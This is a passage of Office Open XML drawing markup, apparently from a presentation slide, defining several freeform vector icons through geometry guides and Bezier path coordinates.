                      <a:pt x="54" y="14"/>
                      <a:pt x="55" y="15"/>
                      <a:pt x="56" y="17"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="13" y="12"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="15" y="10"/>
                      <a:pt x="18" y="8"/>
                      <a:pt x="20" y="7"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="18" y="9"/>
                      <a:pt x="17" y="13"/>
                      <a:pt x="15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0" y="15"/>
                      <a:pt x="11" y="14"/>
                      <a:pt x="13" y="12"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="9" y="47"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="15" y="47"/>
                      <a:pt x="15" y="47"/>
                      <a:pt x="15" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="17" y="51"/>
                      <a:pt x="18" y="54"/>
                      <a:pt x="20" y="57"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="18" y="55"/>
                      <a:pt x="15" y="54"/>
                      <a:pt x="13" y="51"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="11" y="50"/>
                      <a:pt x="10" y="48"/>
                      <a:pt x="9" y="47"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="52" y="51"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="50" y="54"/>
                      <a:pt x="47" y="55"/>
                      <a:pt x="44" y="57"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="47" y="54"/>
                      <a:pt x="48" y="51"/>
                      <a:pt x="50" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="56" y="47"/>
                      <a:pt x="56" y="47"/>
                      <a:pt x="56" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="55" y="48"/>
                      <a:pt x="54" y="50"/>
                      <a:pt x="52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2" name="Freeform 194">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F93DC901-A8E6-4471-9901-8E6B6A1BC2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17214" y="5047577"/>
                <a:ext cx="191818" cy="195733"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 30 w 60"/>
                  <a:gd name="T1" fmla="*/ 0 h 61"/>
                  <a:gd name="T2" fmla="*/ 0 w 60"/>
                  <a:gd name="T3" fmla="*/ 31 h 61"/>
                  <a:gd name="T4" fmla="*/ 30 w 60"/>
                  <a:gd name="T5" fmla="*/ 61 h 61"/>
                  <a:gd name="T6" fmla="*/ 60 w 60"/>
                  <a:gd name="T7" fmla="*/ 31 h 61"/>
                  <a:gd name="T8" fmla="*/ 30 w 60"/>
                  <a:gd name="T9" fmla="*/ 0 h 61"/>
                  <a:gd name="T10" fmla="*/ 30 w 60"/>
                  <a:gd name="T11" fmla="*/ 55 h 61"/>
                  <a:gd name="T12" fmla="*/ 5 w 60"/>
                  <a:gd name="T13" fmla="*/ 31 h 61"/>
                  <a:gd name="T14" fmla="*/ 30 w 60"/>
                  <a:gd name="T15" fmla="*/ 6 h 61"/>
                  <a:gd name="T16" fmla="*/ 55 w 60"/>
                  <a:gd name="T17" fmla="*/ 31 h 61"/>
                  <a:gd name="T18" fmla="*/ 30 w 60"/>
                  <a:gd name="T19" fmla="*/ 55 h 61"/>
                  <a:gd name="T20" fmla="*/ 26 w 60"/>
                  <a:gd name="T21" fmla="*/ 15 h 61"/>
                  <a:gd name="T22" fmla="*/ 34 w 60"/>
                  <a:gd name="T23" fmla="*/ 15 h 61"/>
                  <a:gd name="T24" fmla="*/ 34 w 60"/>
                  <a:gd name="T25" fmla="*/ 23 h 61"/>
                  <a:gd name="T26" fmla="*/ 26 w 60"/>
                  <a:gd name="T27" fmla="*/ 23 h 61"/>
                  <a:gd name="T28" fmla="*/ 26 w 60"/>
                  <a:gd name="T29" fmla="*/ 15 h 61"/>
                  <a:gd name="T30" fmla="*/ 38 w 60"/>
                  <a:gd name="T31" fmla="*/ 46 h 61"/>
                  <a:gd name="T32" fmla="*/ 22 w 60"/>
                  <a:gd name="T33" fmla="*/ 46 h 61"/>
                  <a:gd name="T34" fmla="*/ 22 w 60"/>
                  <a:gd name="T35" fmla="*/ 42 h 61"/>
                  <a:gd name="T36" fmla="*/ 26 w 60"/>
                  <a:gd name="T37" fmla="*/ 42 h 61"/>
                  <a:gd name="T38" fmla="*/ 26 w 60"/>
                  <a:gd name="T39" fmla="*/ 31 h 61"/>
                  <a:gd name="T40" fmla="*/ 22 w 60"/>
                  <a:gd name="T41" fmla="*/ 31 h 61"/>
                  <a:gd name="T42" fmla="*/ 22 w 60"/>
                  <a:gd name="T43" fmla="*/ 27 h 61"/>
                  <a:gd name="T44" fmla="*/ 34 w 60"/>
                  <a:gd name="T45" fmla="*/ 27 h 61"/>
                  <a:gd name="T46" fmla="*/ 34 w 60"/>
                  <a:gd name="T47" fmla="*/ 42 h 61"/>
                  <a:gd name="T48" fmla="*/ 38 w 60"/>
                  <a:gd name="T49" fmla="*/ 42 h 61"/>
                  <a:gd name="T50" fmla="*/ 38 w 60"/>
                  <a:gd name="T51" fmla="*/ 4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0" h="61">
                    <a:moveTo>
                      <a:pt x="30" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="13" y="0"/>
                      <a:pt x="0" y="14"/>
                      <a:pt x="0" y="31"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="47"/>
                      <a:pt x="13" y="61"/>
                      <a:pt x="30" y="61"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="47" y="61"/>
                      <a:pt x="60" y="47"/>
                      <a:pt x="60" y="31"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="60" y="14"/>
                      <a:pt x="47" y="0"/>
                      <a:pt x="30" y="0"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="30" y="55"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="16" y="55"/>
                      <a:pt x="5" y="44"/>
                      <a:pt x="5" y="31"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="17"/>
                      <a:pt x="16" y="6"/>
                      <a:pt x="30" y="6"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="44" y="6"/>
                      <a:pt x="55" y="17"/>
                      <a:pt x="55" y="31"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="55" y="44"/>
                      <a:pt x="44" y="55"/>
                      <a:pt x="30" y="55"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="26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26" y="23"/>
                      <a:pt x="26" y="23"/>
                      <a:pt x="26" y="23"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="26" y="15"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="38" y="46"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="46"/>
                      <a:pt x="22" y="46"/>
                      <a:pt x="22" y="46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6" y="31"/>
                      <a:pt x="26" y="31"/>
                      <a:pt x="26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8" y="42"/>
                      <a:pt x="38" y="42"/>
                      <a:pt x="38" y="42"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="38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3" name="Freeform 196">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EBB05323-ED82-4B55-859C-69A56CF08F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85879" y="5474274"/>
                <a:ext cx="221179" cy="219221"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 35 w 69"/>
                  <a:gd name="T1" fmla="*/ 0 h 69"/>
                  <a:gd name="T2" fmla="*/ 0 w 69"/>
                  <a:gd name="T3" fmla="*/ 35 h 69"/>
                  <a:gd name="T4" fmla="*/ 35 w 69"/>
                  <a:gd name="T5" fmla="*/ 69 h 69"/>
                  <a:gd name="T6" fmla="*/ 69 w 69"/>
                  <a:gd name="T7" fmla="*/ 35 h 69"/>
                  <a:gd name="T8" fmla="*/ 35 w 69"/>
                  <a:gd name="T9" fmla="*/ 0 h 69"/>
                  <a:gd name="T10" fmla="*/ 55 w 69"/>
                  <a:gd name="T11" fmla="*/ 30 h 69"/>
                  <a:gd name="T12" fmla="*/ 36 w 69"/>
                  <a:gd name="T13" fmla="*/ 56 h 69"/>
                  <a:gd name="T14" fmla="*/ 28 w 69"/>
                  <a:gd name="T15" fmla="*/ 52 h 69"/>
                  <a:gd name="T16" fmla="*/ 21 w 69"/>
                  <a:gd name="T17" fmla="*/ 32 h 69"/>
                  <a:gd name="T18" fmla="*/ 16 w 69"/>
                  <a:gd name="T19" fmla="*/ 33 h 69"/>
                  <a:gd name="T20" fmla="*/ 14 w 69"/>
                  <a:gd name="T21" fmla="*/ 31 h 69"/>
                  <a:gd name="T22" fmla="*/ 27 w 69"/>
                  <a:gd name="T23" fmla="*/ 22 h 69"/>
                  <a:gd name="T24" fmla="*/ 34 w 69"/>
                  <a:gd name="T25" fmla="*/ 36 h 69"/>
                  <a:gd name="T26" fmla="*/ 37 w 69"/>
                  <a:gd name="T27" fmla="*/ 44 h 69"/>
                  <a:gd name="T28" fmla="*/ 43 w 69"/>
                  <a:gd name="T29" fmla="*/ 36 h 69"/>
                  <a:gd name="T30" fmla="*/ 38 w 69"/>
                  <a:gd name="T31" fmla="*/ 31 h 69"/>
                  <a:gd name="T32" fmla="*/ 55 w 69"/>
                  <a:gd name="T33" fmla="*/ 3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9" h="69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54"/>
                      <a:pt x="16" y="69"/>
                      <a:pt x="35" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="54" y="69"/>
                      <a:pt x="69" y="54"/>
                      <a:pt x="69" y="35"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="16"/>
                      <a:pt x="54" y="0"/>
                      <a:pt x="35" y="0"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="55" y="30"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="53" y="43"/>
                      <a:pt x="40" y="54"/>
                      <a:pt x="36" y="56"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="32" y="58"/>
                      <a:pt x="29" y="55"/>
                      <a:pt x="28" y="52"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="49"/>
                      <a:pt x="22" y="33"/>
                      <a:pt x="21" y="32"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19" y="30"/>
                      <a:pt x="16" y="33"/>
                      <a:pt x="16" y="33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21" y="23"/>
                      <a:pt x="27" y="22"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="32" y="21"/>
                      <a:pt x="32" y="30"/>
                      <a:pt x="34" y="36"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="35" y="41"/>
                      <a:pt x="36" y="44"/>
                      <a:pt x="37" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="38" y="44"/>
                      <a:pt x="40" y="41"/>
                      <a:pt x="43" y="36"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="45" y="32"/>
                      <a:pt x="42" y="28"/>
                      <a:pt x="38" y="31"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="40" y="20"/>
                      <a:pt x="57" y="17"/>
                      <a:pt x="5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4" name="Freeform 206">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA655022-F3C5-4EC9-8C5C-96FF02AEFD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99988" y="5985138"/>
                <a:ext cx="381680" cy="338617"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 50 w 119"/>
                  <a:gd name="T1" fmla="*/ 0 h 106"/>
                  <a:gd name="T2" fmla="*/ 50 w 119"/>
                  <a:gd name="T3" fmla="*/ 0 h 106"/>
                  <a:gd name="T4" fmla="*/ 99 w 119"/>
                  <a:gd name="T5" fmla="*/ 40 h 106"/>
                  <a:gd name="T6" fmla="*/ 50 w 119"/>
                  <a:gd name="T7" fmla="*/ 81 h 106"/>
                  <a:gd name="T8" fmla="*/ 42 w 119"/>
                  <a:gd name="T9" fmla="*/ 80 h 106"/>
                  <a:gd name="T10" fmla="*/ 7 w 119"/>
                  <a:gd name="T11" fmla="*/ 93 h 106"/>
                  <a:gd name="T12" fmla="*/ 7 w 119"/>
                  <a:gd name="T13" fmla="*/ 90 h 106"/>
                  <a:gd name="T14" fmla="*/ 19 w 119"/>
                  <a:gd name="T15" fmla="*/ 74 h 106"/>
                  <a:gd name="T16" fmla="*/ 18 w 119"/>
                  <a:gd name="T17" fmla="*/ 72 h 106"/>
                  <a:gd name="T18" fmla="*/ 0 w 119"/>
                  <a:gd name="T19" fmla="*/ 40 h 106"/>
                  <a:gd name="T20" fmla="*/ 50 w 119"/>
                  <a:gd name="T21" fmla="*/ 0 h 106"/>
                  <a:gd name="T22" fmla="*/ 103 w 119"/>
                  <a:gd name="T23" fmla="*/ 90 h 106"/>
                  <a:gd name="T24" fmla="*/ 113 w 119"/>
                  <a:gd name="T25" fmla="*/ 104 h 106"/>
                  <a:gd name="T26" fmla="*/ 113 w 119"/>
                  <a:gd name="T27" fmla="*/ 106 h 106"/>
                  <a:gd name="T28" fmla="*/ 83 w 119"/>
                  <a:gd name="T29" fmla="*/ 95 h 106"/>
                  <a:gd name="T30" fmla="*/ 76 w 119"/>
                  <a:gd name="T31" fmla="*/ 96 h 106"/>
                  <a:gd name="T32" fmla="*/ 50 w 119"/>
                  <a:gd name="T33" fmla="*/ 88 h 106"/>
                  <a:gd name="T34" fmla="*/ 90 w 119"/>
                  <a:gd name="T35" fmla="*/ 75 h 106"/>
                  <a:gd name="T36" fmla="*/ 103 w 119"/>
                  <a:gd name="T37" fmla="*/ 60 h 106"/>
                  <a:gd name="T38" fmla="*/ 107 w 119"/>
                  <a:gd name="T39" fmla="*/ 40 h 106"/>
                  <a:gd name="T40" fmla="*/ 107 w 119"/>
                  <a:gd name="T41" fmla="*/ 37 h 106"/>
                  <a:gd name="T42" fmla="*/ 119 w 119"/>
                  <a:gd name="T43" fmla="*/ 61 h 106"/>
                  <a:gd name="T44" fmla="*/ 103 w 119"/>
                  <a:gd name="T45" fmla="*/ 88 h 106"/>
                  <a:gd name="T46" fmla="*/ 103 w 119"/>
                  <a:gd name="T47" fmla="*/ 9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9" h="106">
                    <a:moveTo>
                      <a:pt x="50" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="50" y="0"/>
                      <a:pt x="50" y="0"/>
                      <a:pt x="50" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="77" y="0"/>
                      <a:pt x="99" y="18"/>
                      <a:pt x="99" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="99" y="63"/>
                      <a:pt x="77" y="81"/>
                      <a:pt x="50" y="81"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="47" y="81"/>
                      <a:pt x="44" y="80"/>
                      <a:pt x="42" y="80"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="31" y="91"/>
                      <a:pt x="19" y="93"/>
                      <a:pt x="7" y="93"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="90"/>
                      <a:pt x="7" y="90"/>
                      <a:pt x="7" y="90"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="13" y="87"/>
                      <a:pt x="19" y="81"/>
                      <a:pt x="19" y="74"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19" y="73"/>
                      <a:pt x="19" y="72"/>
                      <a:pt x="18" y="72"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="64"/>
                      <a:pt x="0" y="53"/>
                      <a:pt x="0" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="18"/>
                      <a:pt x="22" y="0"/>
                      <a:pt x="50" y="0"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="103" y="90"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="96"/>
                      <a:pt x="107" y="101"/>
                      <a:pt x="113" y="104"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="113" y="106"/>
                      <a:pt x="113" y="106"/>
                      <a:pt x="113" y="106"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="102" y="106"/>
                      <a:pt x="92" y="104"/>
                      <a:pt x="83" y="95"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="81" y="95"/>
                      <a:pt x="79" y="96"/>
                      <a:pt x="76" y="96"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="96"/>
                      <a:pt x="57" y="93"/>
                      <a:pt x="50" y="88"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="65" y="88"/>
                      <a:pt x="79" y="84"/>
                      <a:pt x="90" y="75"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="95" y="71"/>
                      <a:pt x="100" y="65"/>
                      <a:pt x="103" y="60"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="106" y="54"/>
                      <a:pt x="107" y="47"/>
                      <a:pt x="107" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="107" y="39"/>
                      <a:pt x="107" y="38"/>
                      <a:pt x="107" y="37"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="115" y="43"/>
                      <a:pt x="119" y="52"/>
                      <a:pt x="119" y="61"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="119" y="72"/>
                      <a:pt x="113" y="82"/>
                      <a:pt x="103" y="88"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="89"/>
                      <a:pt x="103" y="89"/>
                      <a:pt x="103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5" name="Freeform 207">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7E9750C-7A41-498E-B7B1-72374CFB44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976852" y="5491891"/>
                <a:ext cx="223135" cy="225092"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 35 w 70"/>
                  <a:gd name="T1" fmla="*/ 0 h 70"/>
                  <a:gd name="T2" fmla="*/ 0 w 70"/>
                  <a:gd name="T3" fmla="*/ 35 h 70"/>
                  <a:gd name="T4" fmla="*/ 35 w 70"/>
                  <a:gd name="T5" fmla="*/ 70 h 70"/>
                  <a:gd name="T6" fmla="*/ 70 w 70"/>
                  <a:gd name="T7" fmla="*/ 35 h 70"/>
                  <a:gd name="T8" fmla="*/ 35 w 70"/>
                  <a:gd name="T9" fmla="*/ 0 h 70"/>
                  <a:gd name="T10" fmla="*/ 29 w 70"/>
                  <a:gd name="T11" fmla="*/ 57 h 70"/>
                  <a:gd name="T12" fmla="*/ 14 w 70"/>
                  <a:gd name="T13" fmla="*/ 38 h 70"/>
                  <a:gd name="T14" fmla="*/ 21 w 70"/>
                  <a:gd name="T15" fmla="*/ 31 h 70"/>
                  <a:gd name="T16" fmla="*/ 29 w 70"/>
                  <a:gd name="T17" fmla="*/ 41 h 70"/>
                  <a:gd name="T18" fmla="*/ 54 w 70"/>
                  <a:gd name="T19" fmla="*/ 21 h 70"/>
                  <a:gd name="T20" fmla="*/ 57 w 70"/>
                  <a:gd name="T21" fmla="*/ 24 h 70"/>
                  <a:gd name="T22" fmla="*/ 29 w 70"/>
                  <a:gd name="T23" fmla="*/ 5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0" h="70">
                    <a:moveTo>
                      <a:pt x="35" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="16" y="0"/>
                      <a:pt x="0" y="16"/>
                      <a:pt x="0" y="35"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="54"/>
                      <a:pt x="16" y="70"/>
                      <a:pt x="35" y="70"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="54" y="70"/>
                      <a:pt x="70" y="54"/>
                      <a:pt x="70" y="35"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="16"/>
                      <a:pt x="54" y="0"/>
                      <a:pt x="35" y="0"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="29" y="57"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="14" y="38"/>
                      <a:pt x="14" y="38"/>
                      <a:pt x="14" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="31"/>
                      <a:pt x="21" y="31"/>
                      <a:pt x="21" y="31"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="29" y="41"/>
                      <a:pt x="29" y="41"/>
                      <a:pt x="29" y="4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7" y="24"/>
                      <a:pt x="57" y="24"/>
                      <a:pt x="57" y="24"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="29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6" name="Freeform 208">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{25407E2E-E3AC-4235-BB80-AA7694E77B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2492" y="5863783"/>
                <a:ext cx="275984" cy="313173"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 55 w 86"/>
                  <a:gd name="T1" fmla="*/ 14 h 98"/>
                  <a:gd name="T2" fmla="*/ 55 w 86"/>
                  <a:gd name="T3" fmla="*/ 27 h 98"/>
                  <a:gd name="T4" fmla="*/ 65 w 86"/>
                  <a:gd name="T5" fmla="*/ 33 h 98"/>
                  <a:gd name="T6" fmla="*/ 74 w 86"/>
                  <a:gd name="T7" fmla="*/ 55 h 98"/>
                  <a:gd name="T8" fmla="*/ 65 w 86"/>
                  <a:gd name="T9" fmla="*/ 77 h 98"/>
                  <a:gd name="T10" fmla="*/ 43 w 86"/>
                  <a:gd name="T11" fmla="*/ 85 h 98"/>
                  <a:gd name="T12" fmla="*/ 22 w 86"/>
                  <a:gd name="T13" fmla="*/ 77 h 98"/>
                  <a:gd name="T14" fmla="*/ 13 w 86"/>
                  <a:gd name="T15" fmla="*/ 55 h 98"/>
                  <a:gd name="T16" fmla="*/ 22 w 86"/>
                  <a:gd name="T17" fmla="*/ 33 h 98"/>
                  <a:gd name="T18" fmla="*/ 31 w 86"/>
                  <a:gd name="T19" fmla="*/ 27 h 98"/>
                  <a:gd name="T20" fmla="*/ 31 w 86"/>
                  <a:gd name="T21" fmla="*/ 14 h 98"/>
                  <a:gd name="T22" fmla="*/ 0 w 86"/>
                  <a:gd name="T23" fmla="*/ 55 h 98"/>
                  <a:gd name="T24" fmla="*/ 43 w 86"/>
                  <a:gd name="T25" fmla="*/ 98 h 98"/>
                  <a:gd name="T26" fmla="*/ 86 w 86"/>
                  <a:gd name="T27" fmla="*/ 55 h 98"/>
                  <a:gd name="T28" fmla="*/ 55 w 86"/>
                  <a:gd name="T29" fmla="*/ 14 h 98"/>
                  <a:gd name="T30" fmla="*/ 37 w 86"/>
                  <a:gd name="T31" fmla="*/ 0 h 98"/>
                  <a:gd name="T32" fmla="*/ 49 w 86"/>
                  <a:gd name="T33" fmla="*/ 0 h 98"/>
                  <a:gd name="T34" fmla="*/ 49 w 86"/>
                  <a:gd name="T35" fmla="*/ 49 h 98"/>
                  <a:gd name="T36" fmla="*/ 37 w 86"/>
                  <a:gd name="T37" fmla="*/ 49 h 98"/>
                  <a:gd name="T38" fmla="*/ 37 w 86"/>
                  <a:gd name="T39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6" h="98">
                    <a:moveTo>
                      <a:pt x="55" y="14"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="55" y="27"/>
                      <a:pt x="55" y="27"/>
                      <a:pt x="55" y="27"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="59" y="28"/>
                      <a:pt x="62" y="31"/>
                      <a:pt x="65" y="33"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="39"/>
                      <a:pt x="74" y="47"/>
                      <a:pt x="74" y="55"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="74" y="63"/>
                      <a:pt x="71" y="71"/>
                      <a:pt x="65" y="77"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="59" y="82"/>
                      <a:pt x="51" y="85"/>
                      <a:pt x="43" y="85"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="35" y="85"/>
                      <a:pt x="27" y="82"/>
                      <a:pt x="22" y="77"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="16" y="71"/>
                      <a:pt x="13" y="63"/>
                      <a:pt x="13" y="55"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="13" y="47"/>
                      <a:pt x="16" y="39"/>
                      <a:pt x="22" y="33"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="24" y="31"/>
                      <a:pt x="27" y="28"/>
                      <a:pt x="31" y="27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13" y="19"/>
                      <a:pt x="0" y="36"/>
                      <a:pt x="0" y="55"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="79"/>
                      <a:pt x="20" y="98"/>
                      <a:pt x="43" y="98"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="98"/>
                      <a:pt x="86" y="79"/>
                      <a:pt x="86" y="55"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="86" y="36"/>
                      <a:pt x="73" y="19"/>
                      <a:pt x="55" y="14"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="37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9" y="49"/>
                      <a:pt x="49" y="49"/>
                      <a:pt x="49" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="49"/>
                      <a:pt x="37" y="49"/>
                      <a:pt x="37" y="49"/>
                    </a:cubicBez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7" name="Freeform 209">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7E368FD0-F4BA-498A-B769-8A840C4883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9960" y="6186742"/>
                <a:ext cx="371892" cy="311215"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 57 w 116"/>
                  <a:gd name="T1" fmla="*/ 1 h 97"/>
                  <a:gd name="T2" fmla="*/ 48 w 116"/>
                  <a:gd name="T3" fmla="*/ 8 h 97"/>
                  <a:gd name="T4" fmla="*/ 55 w 116"/>
                  <a:gd name="T5" fmla="*/ 18 h 97"/>
                  <a:gd name="T6" fmla="*/ 85 w 116"/>
                  <a:gd name="T7" fmla="*/ 22 h 97"/>
                  <a:gd name="T8" fmla="*/ 5 w 116"/>
                  <a:gd name="T9" fmla="*/ 81 h 97"/>
                  <a:gd name="T10" fmla="*/ 3 w 116"/>
                  <a:gd name="T11" fmla="*/ 93 h 97"/>
                  <a:gd name="T12" fmla="*/ 8 w 116"/>
                  <a:gd name="T13" fmla="*/ 96 h 97"/>
                  <a:gd name="T14" fmla="*/ 15 w 116"/>
                  <a:gd name="T15" fmla="*/ 95 h 97"/>
                  <a:gd name="T16" fmla="*/ 95 w 116"/>
                  <a:gd name="T17" fmla="*/ 36 h 97"/>
                  <a:gd name="T18" fmla="*/ 90 w 116"/>
                  <a:gd name="T19" fmla="*/ 66 h 97"/>
                  <a:gd name="T20" fmla="*/ 97 w 116"/>
                  <a:gd name="T21" fmla="*/ 76 h 97"/>
                  <a:gd name="T22" fmla="*/ 107 w 116"/>
                  <a:gd name="T23" fmla="*/ 69 h 97"/>
                  <a:gd name="T24" fmla="*/ 116 w 116"/>
                  <a:gd name="T25" fmla="*/ 10 h 97"/>
                  <a:gd name="T26" fmla="*/ 57 w 116"/>
                  <a:gd name="T27" fmla="*/ 1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97">
                    <a:moveTo>
                      <a:pt x="57" y="1"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="53" y="0"/>
                      <a:pt x="48" y="3"/>
                      <a:pt x="48" y="8"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="47" y="13"/>
                      <a:pt x="50" y="17"/>
                      <a:pt x="55" y="18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1" y="84"/>
